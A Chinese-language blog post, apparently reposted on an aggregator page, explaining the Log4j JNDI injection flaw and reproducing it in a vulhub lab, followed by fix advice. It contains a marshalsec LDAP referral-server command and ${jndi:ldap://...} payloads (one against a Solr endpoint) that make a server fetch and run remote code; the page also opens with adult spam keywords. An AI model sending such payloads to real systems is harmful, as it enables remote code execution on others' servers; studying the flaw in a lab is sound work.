国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

log4j JNDI注入漏洞

這篇具有很好參考價值的文章主要介紹了log4j JNDI注入漏洞。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

log4j JNDI注入漏洞

目錄
  • log4j JNDI注入漏洞
    • 一、LDAP介紹
    • 二、JDBC介紹
    • 三、JNDI介紹
    • 四、JNDI命名引用
    • 五、log4j JNDI注入漏洞

一、LDAP介紹

? LDAP是一種協(xié)議,LDAP 的全稱是 Lightweight Directory Access Protocol,輕量目錄訪問協(xié)議。

二、JDBC介紹

? JDBC是一種規(guī)范,JDBC的全稱是Java數(shù)據(jù)庫連接(Java Database connect),它是一套用于執(zhí)行SQL語句的Java API。

三、JNDI介紹

? JNDI是一種規(guī)范,JNDI的全稱是Java Naming and Directory Interface,Java 命名與目錄接口??梢愿鶕?jù)名字找到對應(yīng)資源。

JNDI可以訪問的服務(wù):

LDAP目錄服務(wù)、RMI遠程方法調(diào)用、DNS、文件系統(tǒng)等。

四、JNDI命名引用

1、在LDAP里面可以存儲一個外部的資源,叫做命名引用,對應(yīng)Reference類。

比如:遠程HTTP服務(wù)的一個.class文件。

2、如果JNDI客戶端,在LDAP服務(wù)中找不到對應(yīng)的資源,就去指定的地址請求。如果是命名引用,會把這個文件下載到本地。

3、如果下載的.class文件包含無參構(gòu)造函數(shù)或靜態(tài)方法塊,加載的時候會自動執(zhí)行。

五、log4j JNDI注入漏洞

? Apache Log4j 2 是Java語言的日志處理套件,使用極為廣泛。在其2.0到2.14.1版本中存在一處JNDI注入漏洞,攻擊者在可以控制日志內(nèi)容的情況下,通過傳入類似于${jndi:ldap://evil.com/example}的lookup用于進行JNDI注入,執(zhí)行任意代碼。

個人理解:(不一定正確)
log4j JNDI注入漏洞主要是因為log4j在日志記錄的方法中調(diào)用了lookup方法,可以通過JNDI去訪問LDAP、RMI等服務(wù),又因為ldap存在命名引用,如果不存在指定文件,就會去指定的url下載到本地,如果下載的.class文件包含無參構(gòu)造函數(shù)和靜態(tài)代碼塊就會被自動執(zhí)行,從而造成任意代碼執(zhí)行。

漏洞利用:

1、kali中開啟vulhub中l(wèi)og4j的靶機

2、開啟獲取資源的http服務(wù)器

3、把惡意的.java文件編譯后的.class文件放到http服務(wù)器上(需要用jdk1.8版本)

4、開啟RMI/LDAP服務(wù)(本機的9999端口)

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.142.1/#TouchFile" 9999

5、bp發(fā)送payload

http://192.168.142.133:8983/solr/admin/cores?action=${jndi:ldap://192.168.142.1:9999/test}

修復思路:

1、禁止用戶請求參數(shù)出現(xiàn)攻擊關(guān)鍵字

2、禁止lookup下載遠程文件(命名引用)

3、禁止log4j的應(yīng)用連接外網(wǎng)

4、禁止log4j使用lookup

5、從log4j jar包中刪除lookup(適合2.10以下版本)

修復方案:

1、將log4j框架升級到2.17.1版本

2、使用安全產(chǎn)品防護文章來源地址http://www.zghlxwxcb.cn/news/detail-428307.html

到了這里,關(guān)于log4j JNDI注入漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • log4j漏洞詳解

    log4j漏洞詳解

    log4j全名就是(log for java),就是apache的一個開源的日志記錄組件 ,它在Java項目中使用的比較廣泛。 使用方法: ??????????????? 1.pom引入依賴 ??????????????? 2.獲取logger實例 ??????????????? 3.logger.info() debug() error() warn()... 優(yōu)點:功能豐富,易于集成

    2024年02月16日
    瀏覽(23)
  • JAVA安全之Log4j-Jndi注入原理以及利用方式

    JAVA安全之Log4j-Jndi注入原理以及利用方式

    什么是JNDI? JDNI(Java Naming and Directory Interface)是Java命名和目錄接口,它提供了統(tǒng)一的訪問命名和目錄服務(wù)的API。 JDNI主要通過JNDI SPI(Service Provider Interface)規(guī)范來實現(xiàn),該規(guī)范定義了對JNDI提供者應(yīng)實現(xiàn)的接口。在JNDI體系中,JNDI提供者是指實際提供命名和目錄服務(wù)的軟件組

    2024年01月19日
    瀏覽(21)
  • Log4j遠程代碼執(zhí)行漏洞

    Log4j遠程代碼執(zhí)行漏洞

    簡介 漏洞描述 Apache Log4j 是 Apache 的一個開源項目,Apache log4j-2 是 Log4j 的升級,我們可以控制日志信息輸送的目的地為控制臺、文件、GUI組件等,通過定義每一條日志信息的級別,能夠更加細致地控制日志的生成過程。 Log4j-2中存在JNDI注入漏洞,當程序?qū)⒂脩糨斎氲臄?shù)據(jù)日志

    2024年02月11日
    瀏覽(25)
  • 網(wǎng)絡(luò)安全 log4j漏洞復現(xiàn)

    網(wǎng)絡(luò)安全 log4j漏洞復現(xiàn)

    前言: log4j被爆出“史詩級”漏洞。其危害非常大,影響非常廣。該漏洞非常容易利用,可以執(zhí)行任意代碼。這個漏洞的影響可謂是重量級的。 漏洞描述: 由于Apache Log4j存在遞歸解析功能,未取得身份認證的用戶,可以從遠程發(fā)送數(shù)據(jù)請求輸入數(shù)據(jù)日志,輕松觸發(fā)漏洞,最

    2024年02月09日
    瀏覽(26)
  • log4j漏洞原理及攻擊流程

    log4j漏洞原理及攻擊流程

    log4j漏洞最早出現(xiàn)在2021年11月24日一位阿里安全團隊的員工發(fā)現(xiàn)的,上報到Apache之后,12月10日凌晨才被公開。該漏洞威脅等級較高?;颈燃缗c阿里當年的fastjson漏洞。 漏洞地址: Log4j是一種流行的Java日志記錄工具,其升級版本Log4j 2存在安全漏洞。這個漏洞是由Log4j 2的lookup功

    2024年02月16日
    瀏覽(26)
  • fastJson反序列化漏洞和log4j漏洞

    有 attach.class (編譯好的文件) 攻擊者建立rmi服務(wù)端,于rmi服務(wù)端建造一系列攻擊對象 ,假設(shè)遠程地址為 http://abc,可url鏈接到惡意class-attach.class 若被攻擊者訪問到此服務(wù) rmi://abc/attach.class ,靜態(tài)代碼塊會優(yōu)先加載,無需構(gòu)造對象。 fastJson通過序列化漏洞 fastJson=1.2.47 (高版本添

    2024年02月16日
    瀏覽(25)
  • 【實戰(zhàn)】一次簡單的log4j漏洞測試

    【實戰(zhàn)】一次簡單的log4j漏洞測試

    更新時間:2021.12.19 參考文檔:https://www.yuque.com/u8021480/crow/dg9xax 在去年 log4j 漏洞剛爆發(fā)的時候,很多平臺都存在漏洞,當時也在第一時間在有授權(quán)的情況下對某論壇進行了滲透測試,結(jié)果發(fā)現(xiàn)存在漏洞,報告之后,漏洞也被很快修復。 本次對該滲透過程進行一個簡單的記錄

    2023年04月26日
    瀏覽(60)
  • 深入解析著名的阿里云Log4j 漏洞

    幾乎每個系統(tǒng)都會使用日志框架,用于記錄日志信息,這些信息可以提供程序運行的上下文,但是日志過多也會影響系統(tǒng)的性能,所以好的日志框架應(yīng)該是可靠,快速和可擴展的。 Apache Log4j2 是一個基于 Java 的日志工具,是Log4j的升級版本,引入了很多豐富的特性,包括高性

    2024年02月16日
    瀏覽(21)
  • 【java安全】Log4j反序列化漏洞

    【java安全】Log4j反序列化漏洞

    關(guān)于Apache Log4j Log4j是Apache的開源項目,可以實現(xiàn)對System.out等打印語句的替代,并且可以結(jié)合spring等項目,實現(xiàn)把日志輸出到控制臺或文件等。而且它還可以通過一個配置文件來靈活地進行配置,而不需要修改應(yīng)用的代碼,滿足了大多數(shù)要求。 就是用來打印日志的 漏洞成因

    2024年02月11日
    瀏覽(23)
  • 修復中間件log4j漏洞方案(直接更換漏洞jar包)

    修復中間件log4j漏洞方案(直接更換漏洞jar包)

    后臺服務(wù)里面的log4j漏洞我們已經(jīng)全部升級處理了,但是一些中間件鏡像包里的log4j漏洞需要單獨處理 解決辦法以ElasticSearch7.6.2為例: (1)找到容器里面有哪些舊的log4j依賴包 (2)去官網(wǎng)找到對應(yīng)新版本的依賴包 (3)把新的依賴包復制到和舊的同文件夾下 (4)刪除舊的依

    2024年02月10日
    瀏覽(34)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包